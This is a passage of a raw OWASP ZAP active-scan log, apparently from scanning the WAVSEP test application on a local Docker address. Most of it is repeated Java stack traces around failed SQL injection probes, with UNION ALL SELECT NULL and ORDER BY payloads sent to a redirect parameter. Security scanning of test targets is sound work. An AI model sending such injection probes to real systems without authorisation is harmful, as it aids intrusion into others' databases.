org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680093 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680095 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680097 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 4908#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 4908# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680098 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680099 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680101 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680102 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680103 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680105 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680107 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680108 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680110 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 